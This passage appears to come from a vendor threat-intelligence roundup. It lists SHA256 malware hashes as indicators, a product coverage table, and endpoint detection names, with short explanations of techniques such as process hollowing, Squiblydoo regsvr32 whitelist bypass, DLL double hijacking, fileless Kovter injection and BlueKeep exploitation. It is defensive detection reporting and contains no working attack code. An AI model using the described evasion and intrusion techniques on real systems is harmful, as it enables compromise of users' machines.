0b3b958139f44f460a29a089de59f5661f61297249f5cd7b741948b2d1ca05cb
14d6240a171e6de56828ac34659c77e7b0aea0e1150a0d582473fa7ff9c5a2af
16b5bfc2f8219c63545809ca357868da0360865e9a5cf56f97bfaf27bd64714c
1942aa9a9665a730e68a6f4e26a410a6b4f6ff7939651476e12a406c740e44eb
1af709367d31c7af875aae946c96e5d2a2a3419607b28e6c9653c288d6c14f1c
1e9e1c74824275b4da9c11c8ac3e5d9d6a9ba7d476c92ae70d7892dd9b299846
1f0c1b14b9e73d267ac6149f600e73db7cf9dc192785347c6ae466cb6a55ee64
2dd96d48956afe79f265e13710ab2fc18f65a516da41d91d23bb3765c1efec99
343b9b92938999ee48c357b71250ef44ff04eccfc2c58a2b18dea763b01afc40
3752dad40edfff331bca63520ecda9fd8574dd5cc1e9a4814b25af7b6c67d6e0
38dff21345a1f4ebb4b1407b9cc089ef403cc0705565c8f3fd085b6170f3d6fc
3bb30ea41b9cd85c69f105d2859a314489af44577b664ce5a5f7c98a85c72699
3c015bc3a08eda3f44963532272027e9c08c1fb9f3207187a274ac616b1055dd
3cb10a3e9755a5d8dc3b2065a683c260beb593240864d22031ed60fd3d3fcc47
3d637bcafb00075b6bd9f651346472a019215f89a0cf0d69a60531dcf043b15f
4d45b8f88b18e4cf015218bec2ddef69130d708efb6066318c4c1b4243a446ff
53a752d76550879b23eb7bb46aeb1130f91a63983d1c4afda2de25b7a9b9721b
6a238c33ef77fd2c5fff833a207084ff00e20baa5b356adae8d05858de1e00a0
6bb5646ba7b134cb33da93a92f4e034ef72272159a37c2b464474d809a935b7b
8a625a2e07909c94edc660948e75032290e4bb4f437328d0059f414cea6fe137
8c6cdb171037634f3d6176cfff26326d1e4cfda63ee7e2a516a72d0d4c278020

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (15802)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (9224)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
A Microsoft Office process has started a windows utility. - (1655)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many malware different malware campaigns and families.
Crystalbit-Apple DLL double hijack detected - (1052)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Dealply adware detected - (465)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Squiblydoo application whitelist bypass attempt detected. - (444)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Kovter injection detected - (430)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Cobalt Strike activity detected - (184)
Cobalt Strike is a tool used by both penetration testers and malicious actors. It has been observed being used to deliver Ryuk ransomware and other payloads.
Gamarue malware detected - (107)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
CVE-2019-0708 detected - (93)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.